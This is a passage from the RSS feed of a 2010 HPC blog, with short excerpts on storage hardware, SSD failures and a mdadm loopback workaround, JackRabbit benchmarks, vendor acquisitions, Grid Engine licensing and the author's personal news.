      <guid>https://blog.scalability.org/2010/10/our-friends-at-pervasive-software-showing-smith-waterman-results/</guid>
      <description>While I am pleased to see them in the news, and they are showing how their technology works well on a multi core system &amp;hellip; I guess I am troubled by something. Maybe it was the run on the SGI Altix unit. You don&amp;rsquo;t expect many of those to be around. Maybe it was the 30x performance gap over the CUDASW++. Which suggests that 30 nodes with 2 Teslas each could match the results obtained, at a fraction of the cost, power, floor space, cooling budget.</description>
    </item>
    
    <item>
      <title>IBM grabs Blade Networks</title>
      <link>https://blog.scalability.org/2010/10/ibm-grabs-blade-networks/</link>
      <pubDate>Fri, 01 Oct 2010 13:47:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/10/ibm-grabs-blade-networks/</guid>
      <description>Again,M&amp;amp;A; on a roll. Larger vendors going for the &amp;ldquo;integrated&amp;rdquo; stack. I won&amp;rsquo;t comment on whether or not a single vendor is a good idea for anything &amp;hellip; there are several recent examples of single vendor with a change of business direction resulting in a rather large and extended &amp;ldquo;oh-feces&amp;rdquo; situations for their now former HPC client??le. There are economies of scale, there are synergies. One company cannot hope to do everything well for all customers.</description>
    </item>
    
    <item>
      <title>The business side of things ...</title>
      <link>https://blog.scalability.org/2010/09/the-business-side-of-things/</link>
      <pubDate>Thu, 30 Sep 2010 00:49:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/the-business-side-of-things/</guid>
      <description>Doing more siCluster quotes per day than I thought I would be at this stage. Each unit in the JackRabbit JR4 based siCluster sustains well over 2GB/s to and from disk for TB sized files. Some of the benchmarks we&amp;rsquo;ve seen suggest strongly that &amp;lsquo;competitive&amp;rsquo; solutions require many more of their systems to achieve bandwidth and application performance parity, which turns the already unfavorable price performance comparison into a rout. We are hearing from customers deploying JackRabbit units in ways we didn&amp;rsquo;t originally intend, now indicating that they scale quite a bit better than their modern (insert enterprise NAS vendors here) NAS system.</description>
    </item>
    
    <item>
      <title>More M&amp;A in HPC</title>
      <link>https://blog.scalability.org/2010/09/more-ma-in-hpc/</link>
      <pubDate>Wed, 29 Sep 2010 09:34:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/more-ma-in-hpc/</guid>
      <description>Hearing more M&amp;amp;A; rumors, can&amp;rsquo;t say who. This is the time to buy, get the deal done now before the prices rise.</description>
    </item>
    
    <item>
      <title>OT: Learning how to work with only one hand</title>
      <link>https://blog.scalability.org/2010/09/ot-learning-how-to-work-with-only-one-hand/</link>
      <pubDate>Wed, 29 Sep 2010 09:32:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/ot-learning-how-to-work-with-only-one-hand/</guid>
      <description>I have a cast on from my hand surgery last week. I have a new metal plate attached to my bone. Learning to be a southpaw isnt easy. I get the cast off this morning. Should be fun. Then the PT starts. This is one of the very few forms of socially and legally acceptable torture on the planet.</description>
    </item>
    
    <item>
      <title>IBM grabs Netezza</title>
      <link>https://blog.scalability.org/2010/09/ibm-grabs-netezza/</link>
      <pubDate>Fri, 24 Sep 2010 03:05:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/ibm-grabs-netezza/</guid>
      <description>IBM is acquiring Netezza for $1.7B USD. This can be an interesting play in massive OLAP and BI. both of which resist calling themselves HPC, but most definitely are. M&amp;amp;A; is continuing to heat up folks. The big guys are buying the little guys. [update] &amp;hellip; and of course there is weirdness &amp;hellip; according to a lawsuit, Netezza allegedly reverse engineered someone else&amp;rsquo;s product &amp;hellip; incorrectly at that &amp;hellip; and sold it to its customers.</description>
    </item>
    
    <item>
      <title>Great concept from the UK ...</title>
      <link>https://blog.scalability.org/2010/09/great-concept-from-the-uk/</link>
      <pubDate>Thu, 23 Sep 2010 04:46:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/great-concept-from-the-uk/</guid>
      <description>We should replicate it here. From the article.
I&amp;rsquo;ve mentioned it many times, but the primary driver of significant sea changes are cost issues. Cloud and open source are both mechanisms for reducing desktop application costs. Similar pressures are in place in HPC. Cloud HPC is currently mostly an overflow computing model, with some folks using it for primary computing. I expect more to start using these for primary computing, along with their super desktops.</description>
    </item>
    
    <item>
      <title>OT: what my hand looks like (x-ray)</title>
      <link>https://blog.scalability.org/2010/09/ot-what-my-hand-looks-like-x-ray/</link>
      <pubDate>Tue, 21 Sep 2010 18:58:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/ot-what-my-hand-looks-like-x-ray/</guid>
      <description>Not gross, but if you are a little squeamish, don&amp;rsquo;t click the picture for the big one. Here&amp;rsquo;s the small image.
[ ](http://scalability.org/images/joes_hand_broken_marked.jpg)
The green arrows, hand drawn by me, should show the two problems. First is on the left of the image, a chunk of the knuckle has been broken off. Yeah, that hurts. But the other arrow, on the right hand side, explains why it hurts when it is straight.</description>
    </item>
    
    <item>
      <title>Every time I upgrade an OS ... every single time ...</title>
      <link>https://blog.scalability.org/2010/09/every-time-i-upgrade-an-os-every-single-time/</link>
      <pubDate>Mon, 20 Sep 2010 14:08:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/every-time-i-upgrade-an-os-every-single-time/</guid>
      <description>Java and its connection to browsers break. Now normally, I wouldn&amp;rsquo;t care, as I don&amp;rsquo;t personally have a very high opinion of the be-all-and-end-all language/system known as java. Its overly verbose, under performing, and doesn&amp;rsquo;t play well with any operating system. Copy/paste buffers &amp;hellip; well, there is a whole huge litany of issues with it, and I am not even remotely the only one who has them. Updated desktop OS. Now at Ubuntu 10.</description>
    </item>
    
    <item>
      <title>Cost/risk benefit analysis</title>
      <link>https://blog.scalability.org/2010/09/costrisk-benefit-analysis/</link>
      <pubDate>Sat, 18 Sep 2010 16:23:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/costrisk-benefit-analysis/</guid>
      <description>There are costs to taking specific actions, there are risks, and there may be benefits. Here is an example of a risk (or cost) Q: what do you get when you spar (e.g. fight in a controlled manner so as to work on technique) with a 3rd dan (3rd degree blackbelt), and then mess up on a kick block? A: a broken middle finger on the right hand So typing is now hunt and peck.</description>
    </item>
    
    <item>
      <title>The missing middle, a marketing term, but a real problem</title>
      <link>https://blog.scalability.org/2010/09/the-missing-middle-a-marketing-term-but-a-real-problem/</link>
      <pubDate>Thu, 16 Sep 2010 17:04:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/the-missing-middle-a-marketing-term-but-a-real-problem/</guid>
      <description>If you listen to IDC talk about HPC, they will talk about &amp;ldquo;the missing middle&amp;rdquo;, which is basically a marketing term for a market segment that isn&amp;rsquo;t being well addressed by HPC vendors with clusters. It is being addressed by some (hint: the day job) in a variety of ways. An article at InsideHPC by Rich Brueckner gave it a good contextual background, in terms of historical trends in HPC tending to favor the lower cost deployments of processing power.</description>
    </item>
    
    <item>
      <title>On benchmarking in general</title>
      <link>https://blog.scalability.org/2010/09/on-benchmarking-in-general/</link>
      <pubDate>Thu, 16 Sep 2010 05:05:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/on-benchmarking-in-general/</guid>
      <description>I wonder if the reason there are so many bad benchmarks and incorrect conclusions drawn from bad benchmarks comes, to some significant level, from a basic misunderstanding of measurement, how to perform them, and what you are measuring. Several years ago, we watched folks who should know better, insist that 2GB bonnie++ data (the 2GB file size) was the only relevant one for their storage systems and it told them everything they needed to know about storage.</description>
    </item>
    
    <item>
      <title>Interesting post on benchmarking</title>
      <link>https://blog.scalability.org/2010/09/interesting-post-on-benchmarking/</link>
      <pubDate>Tue, 14 Sep 2010 23:25:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/interesting-post-on-benchmarking/</guid>
      <description>Here. In it, the author makes a number of points. Some I take no issue with, or don&amp;rsquo;t have direct knowledge of. Others &amp;hellip;
Erp &amp;hellip; You only get the &amp;ldquo;faster&amp;rdquo; speeds with easily compressible data. You get the far slower speeds when the data isn&amp;rsquo;t so easy to compress. We know. We measured this, and observed it. If you write all zeros, just like in the days when compilers special cased particular codes (cough cough), its possible disks don&amp;rsquo;t even do the writes.</description>
    </item>
    
    <item>
      <title>The SSDs that failed</title>
      <link>https://blog.scalability.org/2010/09/the-ssds-that-failed/</link>
      <pubDate>Tue, 14 Sep 2010 19:46:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/the-ssds-that-failed/</guid>
      <description>The OEM went silent. We reported the issues, opened RMAs. To say I am not pleased &amp;hellip; well &amp;hellip; These are Corsair CMFSSD-32D1 units. According to their site
Ummm &amp;hellip; no. Not even close. We are experiencing about a 70% failure rate, within 3 months of acquisition. In many different chassis, in many different parts of the world, with many different power supplies, many different motherboards. This is a time correlated failure.</description>
    </item>
    
    <item>
      <title>no rest for the wicked ...</title>
      <link>https://blog.scalability.org/2010/09/no-rest-for-the-wicked/</link>
      <pubDate>Mon, 13 Sep 2010 21:02:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/no-rest-for-the-wicked/</guid>
      <description>busy busy busy busy &amp;hellip;.</description>
    </item>
    
    <item>
      <title>SSD failure issue explained</title>
      <link>https://blog.scalability.org/2010/09/ssd-failure-issue-explained/</link>
      <pubDate>Sun, 12 Sep 2010 03:53:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/ssd-failure-issue-explained/</guid>
      <description>I think I understand most of it. The OEM went dark on communicating with us. This is unfortunate. I really wish they hadn&amp;rsquo;t. Suffice it to say we are replacing all of the units of theirs we have in field. We have documentation up on our documentation site on how to do the swap out. It appears to be a bad batch. I am guessing (until we learn otherwise) that they got some bad silicon at some point.</description>
    </item>
    
    <item>
      <title>9/11 memorium</title>
      <link>https://blog.scalability.org/2010/09/911-memorium/</link>
      <pubDate>Sat, 11 Sep 2010 14:09:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/911-memorium/</guid>
      <description>Not an HPC topic, but one that all Americans can reflect upon &amp;hellip; their thoughts, their experiences &amp;hellip; and to resolve not to let this happen ever again, in any form. Never again. I had left SGI, and was working for a smaller engineering software company. I had lined up a bunch of interviews for an open position we had. My buddy Al was flying out from NY with his team to visit someone I know in Ann Arbor, and I was going to try to grab them for lunch or dinner.</description>
    </item>
    
    <item>
      <title>Oracle and Netapp bury the ZFS patent hatchet</title>
      <link>https://blog.scalability.org/2010/09/oracle-and-netapp-bury-the-zfs-patent-hatchet/</link>
      <pubDate>Fri, 10 Sep 2010 13:14:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/oracle-and-netapp-bury-the-zfs-patent-hatchet/</guid>
      <description>Color me skeptical. I don&amp;rsquo;t think there has been an actual resolution of the core issues, just an agreement to abstain from legal hostilities. See this article for some information. ZFS will continue as a patent encumbered software stack, and since no resolution exists between Oracle and Netapp, Netapp could, potentially, press its claims against any other customer/user of ZFS. This isn&amp;rsquo;t a good thing for anyone using or contemplating using ZFS, from any source other than Oracle.</description>
    </item>
    
    <item>
      <title>... and the day job desktop disk blowed up ...</title>
      <link>https://blog.scalability.org/2010/09/and-the-day-job-desktop-disk-blowed-up/</link>
      <pubDate>Thu, 09 Sep 2010 02:01:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/and-the-day-job-desktop-disk-blowed-up/</guid>
      <description>Well, the OS drive did anyway. The home directory data is happily living on the RAID unit. Curiously, we just got our BackupPC based backup unit set up, and it was backing this unit up &amp;hellip; Oh well. No great loss, apart from setup time for the new OS drive(s). Will do a software RAID 1 this time. And likely make it an SSD pair.</description>
    </item>
    
    <item>
      <title>Ceph updates</title>
      <link>https://blog.scalability.org/2010/09/ceph-updates/</link>
      <pubDate>Mon, 06 Sep 2010 15:34:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/ceph-updates/</guid>
      <description>rbd is in testing. Have a look at the link, but here are some of the highlights
   * network block device backed by objects in the Ceph distributed object store (rados) * thinly provisioned * image resizing * image export/import/copy/rename * read-only snapshots * revert to snapshot * Linux and qemu/kvm clients  We are doing something like this now, to a degree, with a mashup of tools in our target.</description>
    </item>
    
    <item>
      <title>Day job has a &#34;Cash for Clunkers&#34; program up</title>
      <link>https://blog.scalability.org/2010/09/day-job-has-a-cash-for-clunkers-program-up/</link>
      <pubDate>Mon, 06 Sep 2010 13:18:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/day-job-has-a-cash-for-clunkers-program-up/</guid>
      <description>For those who don&amp;rsquo;t get the reference, &amp;ldquo;Cash for Clunkers&amp;rdquo; is a colloquialism meaning a hardware trade-in program for old gear. PR is here, and direct link to the site itself here. Basically, we&amp;rsquo;ll take old [HPC] storage gear and provide a discount to you for taking this old gear. There are limitations on which old gear, as well it must be operational and in working order, etc. . Also you are responsible for shipping costs.</description>
    </item>
    
    <item>
      <title>We&#39;ve come a long way in 13 years ...</title>
      <link>https://blog.scalability.org/2010/09/weve-come-a-long-way-in-13-years/</link>
      <pubDate>Sat, 04 Sep 2010 15:08:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/weve-come-a-long-way-in-13-years/</guid>
      <description>Have a look at today&amp;rsquo;s Google home page, and you see the 25th anniversary of buckyballs, aka fullerene, which are particular structures made out of carbon. These fullerenes are very much related to graphite (pencil &amp;ldquo;lead&amp;rdquo;), and have some very interesting physics and chemistry of their own. They were discovered when I was in my Sophmore/Junior years as an undergraduate. Not feeling old. Nosiree. This isn&amp;rsquo;t what the post is about, and yes, there is a huge connection to HPC.</description>
    </item>
    
    <item>
      <title>Passing of torches in the industry</title>
      <link>https://blog.scalability.org/2010/09/passing-of-torches-in-the-industry/</link>
      <pubDate>Fri, 03 Sep 2010 03:24:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/passing-of-torches-in-the-industry/</guid>
      <description>One constant in the world is change. You can fear it, or learn to embrace it. This is part of all markets, HPC and many others. This morning we woke to news that Rich Brueckner bought InsideHPC. Rich is a good reporter and writer, has a marketing firm, and has been working in HPC for a while. We spent time as colleagues at SGI/Cray (yeah, its been a while). Rich now owns one of the brightest brands in HPC news and information.</description>
    </item>
    
    <item>
      <title>Workaround for the SSD RAID1 dual drive failure mode</title>
      <link>https://blog.scalability.org/2010/09/workaround-for-the-ssd-raid1-dual-drive-failure-mode/</link>
      <pubDate>Wed, 01 Sep 2010 21:11:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/09/workaround-for-the-ssd-raid1-dual-drive-failure-mode/</guid>
      <description>At least it can keep things operating while we get parts out. Shipped a number today, placed another order for the new vendors drives. I can confirm that heat is an issue with SSDs.
As root, on the unit, decide where you are going to place an image, then dd if=/dev/zero of=/path/to/loopback/raid.img bs=1 count=1 \ seek=32G losetup /dev/loop0 /path/to/loopback/raid.img mdadm --grow /dev/md0 -n3 mdadm /dev/md0 --add /dev/loop0  This will copy the OS to the a file, and we can (later if need be) recover from problems.</description>
    </item>
    
    <item>
      <title>Never seen anything like this before.  Ever.</title>
      <link>https://blog.scalability.org/2010/08/never-seen-anything-like-this-before-ever/</link>
      <pubDate>Tue, 31 Aug 2010 21:09:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/never-seen-anything-like-this-before-ever/</guid>
      <description>[update] I am starting to think some of these things are heat issues. Not generated heat, but ambient heat. I took a pair of SSDs from our lab (running quite warm, 5 ton AC unit ready to be hooked up) which were giving minor read errors (different vendor), and they operated flawlessly in my basement lab (quite cold) hmmmm&amp;hellip;.. I see some SSDs being sacrificed in the near future. I am starting to wonder if any of them has been actually tested in the higher heat environments.</description>
    </item>
    
    <item>
      <title>Tiburon, now with booting over iSCSI</title>
      <link>https://blog.scalability.org/2010/08/tiburon-now-with-booting-over-iscsi/</link>
      <pubDate>Sat, 28 Aug 2010 20:00:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/tiburon-now-with-booting-over-iscsi/</guid>
      <description>Woot &amp;hellip; have it working nicely in the lab. A few more tweaks to the environment, and we should be able to test in the field. We&amp;rsquo;ve been comparing NFS booting, iSCSI booting, and ramdisk based booting for siCluster systems. We&amp;rsquo;ve been wanting to do more than PXE loads, and provide multiple levels of resiliency that we can using a technology like this. As it turns out, this dovetails beautifully into how we load our JackRabbit and DeltaV units in siCluster.</description>
    </item>
    
    <item>
      <title>Preparing for a new JackRabbit benchmark report</title>
      <link>https://blog.scalability.org/2010/08/preparing-for-a-new-jackrabbit-benchmark-report/</link>
      <pubDate>Fri, 27 Aug 2010 12:57:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/preparing-for-a-new-jackrabbit-benchmark-report/</guid>
      <description>We&amp;rsquo;ve been gathering data on the new machine. So far, it has exceeded our expectations a bit. Its one of, if not the fastest &amp;hellip; and not by a little bit mind you, spinning rust 24 drive SATA 2 server we&amp;rsquo;ve seen in the market. Obviously we are happy with this. Gathering more data. Will report soon.</description>
    </item>
    
    <item>
      <title>Start popping the pop-corn, this is getting interesting to watch ...</title>
      <link>https://blog.scalability.org/2010/08/start-popping-the-pop-corn-this-is-getting-interesting-to-watch/</link>
      <pubDate>Fri, 27 Aug 2010 12:52:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/start-popping-the-pop-corn-this-is-getting-interesting-to-watch/</guid>
      <description>Outright bidding war between Dell and HP for 3Par. HP topped Dells bid, so Dell responded. Press releases were released. They continued to walk do the aisle. And then HP upped its bid. Currently at $1.8B and climbing. Thinking about HPs strategy, I wonder if they really want 3PAR or if they really want to deny Dell the company. And how much the latter is worth to HP. They have some competitive technology in their portfolio.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2010-08-27</title>
      <link>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-27/</link>
      <pubDate>Fri, 27 Aug 2010 11:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-27/</guid>
      <description>* New revision of #[scalableinformatics](http://search.twitter.com/search?q=%23scalableinformatics) #jackrabbit JR4 machine is positively roaring. &amp;gt; 2GB/s sustained read/write on 1TB writes/reads [#](http://twitter.com/sijoe/statuses/22183531579)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>Lustre 1.8.4 and 2.0 have been released</title>
      <link>https://blog.scalability.org/2010/08/lustre-1-8-4-and-2-0-have-been-released/</link>
      <pubDate>Thu, 26 Aug 2010 20:59:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/lustre-1-8-4-and-2-0-have-been-released/</guid>
      <description>Normally would suggest going to the Lustre site for details, though it hasn&amp;rsquo;t rolled over yet. So look here for 1.8.4 download, and here for 2.0 download. The 2.0 GA release has a changelog which is sparse, but to be expected. The 1.8.4 GA release changelog is here.</description>
    </item>
    
    <item>
      <title>More updated JackRabbit benchmark pr0n: bonnie&#43;&#43;</title>
      <link>https://blog.scalability.org/2010/08/more-updated-jackrabbit-benchmark-pr0n-bonnie/</link>
      <pubDate>Thu, 26 Aug 2010 17:45:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/more-updated-jackrabbit-benchmark-pr0n-bonnie/</guid>
      <description>Again, this is our 5th generation JackRabbit unit, sold as individual servers or in siCluster storage clusters. Baseline bonnie++ results. Remember, I am not a fan of using this as a test engine, as I&amp;rsquo;ve noted in the blog a few times. Very basic, very simple test. Machine has 144GB ram, so we need to write 288GB for the test. It is configured for streaming IO, not random IO. RAID6&amp;rsquo;s, not RAID0.</description>
    </item>
    
    <item>
      <title>Untuned basic time trials</title>
      <link>https://blog.scalability.org/2010/08/untuned-basic-time-trials/</link>
      <pubDate>Thu, 26 Aug 2010 15:03:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/untuned-basic-time-trials/</guid>
      <description>So we have a new generation (5th) JackRabbit in the lab, for a financial services customer. Have lots of similar machines out to bit for next generation sequencing (NGS), and many other things. This is the initial bring up test run. I think you might like these numbers. First off, configuration:
 RAID6 volumes. These are NOT RAID0. I want to emphasize this. Primary storage are SATA 2 drives at 7200 RPM.</description>
    </item>
    
    <item>
      <title>Going to the test track tomorrow ...</title>
      <link>https://blog.scalability.org/2010/08/going-to-the-test-track-tomorrow/</link>
      <pubDate>Wed, 25 Aug 2010 18:59:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/going-to-the-test-track-tomorrow/</guid>
      <description>&amp;hellip; building what is arguably the fastest JR4 unit to date, for a customer in financial services. Those folks really seem to like us. I&amp;rsquo;ll update as soon as I can. Should be interesting (barring any issues). Will do some baseline speed trials, and if things look good, we&amp;rsquo;ll hit the accelerator hard and see what it can do.</description>
    </item>
    
    <item>
      <title>Echoing what I&#39;ve said here many times ...</title>
      <link>https://blog.scalability.org/2010/08/echoing-what-ive-said-here-many-times/</link>
      <pubDate>Wed, 25 Aug 2010 14:16:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/echoing-what-ive-said-here-many-times/</guid>
      <description>Good article by Declan McCullagh at CNET. By all means, read it all, but here are some choice quotes:
If you adopt a business overtly hostile tax and regulatory regime, such as here in Michigan, you are going to drive businesses away, and cause those that are here to rethink investment. In growth, in people, &amp;hellip; I am still trying to wrap my brain around Obamacare, and what it means to us as a small company.</description>
    </item>
    
    <item>
      <title>For the cloud business model to work, this can&#39;t happen</title>
      <link>https://blog.scalability.org/2010/08/for-the-cloud-business-model-to-work-this-cant-happen/</link>
      <pubDate>Tue, 24 Aug 2010 14:21:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/for-the-cloud-business-model-to-work-this-cant-happen/</guid>
      <description>[
Microsoft hit by cloudy downtime in US Two-hour outage for some hosted services  ](http://www.theregister.co.uk/2010/08/24/microsoft_bpos_us_outage/) One very important leg that cloud stands upon is &amp;ldquo;I can get to my data and applications no matter what&amp;rdquo; subject to the availability of networking and clients capable of reaching that data. Sort of like &amp;ldquo;I can drive to Traverse City, no matter what&amp;rdquo;, subject to the availability of fuel and passable roads between where ever you are and Traverse City.</description>
    </item>
    
    <item>
      <title>Curiouser and curiouser ... HP tries to outbid Dell for 3Par</title>
      <link>https://blog.scalability.org/2010/08/curiouser-and-curiouser-hp-tries-to-outbid-dell-for-3par/</link>
      <pubDate>Tue, 24 Aug 2010 14:10:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/curiouser-and-curiouser-hp-tries-to-outbid-dell-for-3par/</guid>
      <description>Saw this one this morning. From the article &amp;hellip;
Bidding war? I&amp;rsquo;ve said the M&amp;amp;A; is gonna get more interesting going forward.</description>
    </item>
    
    <item>
      <title>I know, lets fix an obvious software issue by redefining reality ...</title>
      <link>https://blog.scalability.org/2010/08/i-know-lets-fix-an-obvious-software-issue-by-redefining-reality/</link>
      <pubDate>Tue, 24 Aug 2010 12:39:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/i-know-lets-fix-an-obvious-software-issue-by-redefining-reality/</guid>
      <description>A little preface. In the late 1800&amp;rsquo;s, Indiana had some legislation to consider. It boiled down to the &amp;ldquo;squaring of a circle&amp;rdquo; which effectively put a value on pi (??) that was not correct. Go read the history, its actually a little sad. The point of this is that reason eventually won out, and
So what is it that has put a proverbial bee in my proverbial bonnet? A software group wants to effectively change the definition of UTC (a time standard) so as not to cause software to break, rather than, I dunno, fixing the software?</description>
    </item>
    
    <item>
      <title>Updates on {SO}GE aka GridEngine</title>
      <link>https://blog.scalability.org/2010/08/updates-on-soge-aka-gridengine/</link>
      <pubDate>Mon, 23 Aug 2010 15:47:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/updates-on-soge-aka-gridengine/</guid>
      <description>Alrighty &amp;hellip; looks like there is additional information. Sun changed the license in 2009 for a 120 user test period, all Oracle did was change this to 60 day, and firmed up some of the rest of the language. There is a debate running on the mailing list, which, while some are (erroneously) claiming that its FUD, we see now, in all its glory, the issue of incompatible licenses. SGE/OGE is covered under something called SISSL.</description>
    </item>
    
    <item>
      <title>OT: Tournament weekend in Traverse City Michigan ... weapons, sparring, and kata (with video)</title>
      <link>https://blog.scalability.org/2010/08/ot-tournament-weekend-in-traverse-city-michigan-weapons-sparring-and-kata-with-video/</link>
      <pubDate>Mon, 23 Aug 2010 05:27:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/ot-tournament-weekend-in-traverse-city-michigan-weapons-sparring-and-kata-with-video/</guid>
      <description>I took friday off of work (sort of), and we drove up to Traverse City for the White Tigers tournament. Kudos to them for putting on a nice event. My daughter participated in 2 events, weapons and hand kata, and I did 3 as I also did kumite (sparring). Between the two of us, we brought home 4 trophies &amp;hellip; 1 first (kata), 2 second (sparring and weapons), and 1 third (weapons).</description>
    </item>
    
    <item>
      <title>... and SGE goes 90-day trial license ...</title>
      <link>https://blog.scalability.org/2010/08/and-sge-goes-90-day-trial-license/</link>
      <pubDate>Thu, 19 Aug 2010 15:06:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/and-sge-goes-90-day-trial-license/</guid>
      <description>SGE, aka, Sun Grid Engine, is the latest bit of HPC collateral damage in the Oracle digestion of Sun. This is not to say its going away, Dan Templeton has a nice post on his site indicating that they have a roadmap and a future. Its just that it is no longer open source. You can&amp;rsquo;t use it for more than 90 days w/o a paid license from Oracle. Whoops. This said, the GE community is stepping up to do something about this, though my concern is that Oracle could lean on them a little.</description>
    </item>
    
    <item>
      <title>A question every business has to ask themselves ...</title>
      <link>https://blog.scalability.org/2010/08/a-question-every-business-has-to-ask-themselves/</link>
      <pubDate>Thu, 19 Aug 2010 03:42:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/a-question-every-business-has-to-ask-themselves/</guid>
      <description>that is, what business are you in? Sounds strange &amp;hellip; doesn&amp;rsquo;t it. This comes up from some recent experience with customers who are paying very late. Thinking this through, I am reminded of one of my favorite local restaurants, with a little aphorism on its wall. It reads
This goes to the fundamental truth about your business and your competencies. We aren&amp;rsquo;t a lender of capital. I think its time we stopped any pretense at it.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2010-08-18</title>
      <link>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-18/</link>
      <pubDate>Wed, 18 Aug 2010 11:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-18/</guid>
      <description>* We now have customers on 4 continents ... WOOT! [#](http://twitter.com/sijoe/statuses/21434952930)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>Dell takes 3PAR</title>
      <link>https://blog.scalability.org/2010/08/dell-takes-3par/</link>
      <pubDate>Mon, 16 Aug 2010 15:32:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/dell-takes-3par/</guid>
      <description>3PAR isn&amp;rsquo;t technically high performance storage. They are more of a competitor to EMC and HDS. Specifically in the array arena. This arena is a large one, though arrays are losing favor as compared to clustered storage systems (IDCs view, and I think StorageMojo&amp;rsquo;s as well). The article notes the price at $1.15B USD. It suggests Dell is focusing upon the integrated stack worldview, and thinks a switch vendor will be next.</description>
    </item>
    
    <item>
      <title>Did I mention RAID is not backup?</title>
      <link>https://blog.scalability.org/2010/08/did-i-mention-raid-is-not-backup/</link>
      <pubDate>Mon, 16 Aug 2010 15:19:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/did-i-mention-raid-is-not-backup/</guid>
      <description>Another customer, been bugging them about this for a while. Get a backup of your data. Don&amp;rsquo;t presume that RAID means you can&amp;rsquo;t back it up. Then they encounter an issue. So &amp;hellip; work with me on this. What is the cost of making 1 copy for cold storage somewhere? Cost in time and in hardware for storage. Then compare to that, what is the cost of recreating the lost data should something break?</description>
    </item>
    
    <item>
      <title>Yes!</title>
      <link>https://blog.scalability.org/2010/08/yes/</link>
      <pubDate>Sat, 14 Aug 2010 22:13:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/yes/</guid>
      <description>A good article on job creation and innovation at techcrunch. The author makes many points I have made in the past myself. His closing paragraph is dead on.
Yes. Exactly. Please, by all means, read it all.</description>
    </item>
    
    <item>
      <title>#include &#34;opensolaris_eulogy.h&#34;</title>
      <link>https://blog.scalability.org/2010/08/insert-opensolaris_eulogy-h/</link>
      <pubDate>Sat, 14 Aug 2010 00:21:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/insert-opensolaris_eulogy-h/</guid>
      <description>She&amp;rsquo;s dead Jim. OpenSolaris is officially no more. From the memo, I don&amp;rsquo;t expect to see ZFS outside of Solaris any time soon. Which, in light of the development of btrfs and ceph (among others) will matter less and less over time. [update] oh yeah &amp;hellip; in my rush to get this up, I used &amp;ldquo;insert&amp;rdquo; and not &amp;ldquo;include&amp;rdquo;. So a quick  $title =~ s/insert/include/g ; and it makes more sense.</description>
    </item>
    
    <item>
      <title>Shouldn&#39;t we just say no to java already?</title>
      <link>https://blog.scalability.org/2010/08/shouldnt-we-just-say-no-to-java-already/</link>
      <pubDate>Fri, 13 Aug 2010 12:31:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/shouldnt-we-just-say-no-to-java-already/</guid>
      <description>Oracle is now going after Java centric products, specifically starting with Google. Java itself has largely failed as a write once run anywhere platform &amp;hellip; it has always been a (not terribly good) solution in search of a (narrow) problem niche, trying to pretend to be a wide scale solution to all problems everywhere. And in that, it fails, miserably. There are two very painful aspects of web based applications I deal with on a daily basis.</description>
    </item>
    
    <item>
      <title>zOMG like ... nodmraid boot option totally doesnt work ...</title>
      <link>https://blog.scalability.org/2010/08/zomg-like-nodmraid-boot-option-totally-doesnt-work/</link>
      <pubDate>Thu, 12 Aug 2010 17:50:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/zomg-like-nodmraid-boot-option-totally-doesnt-work/</guid>
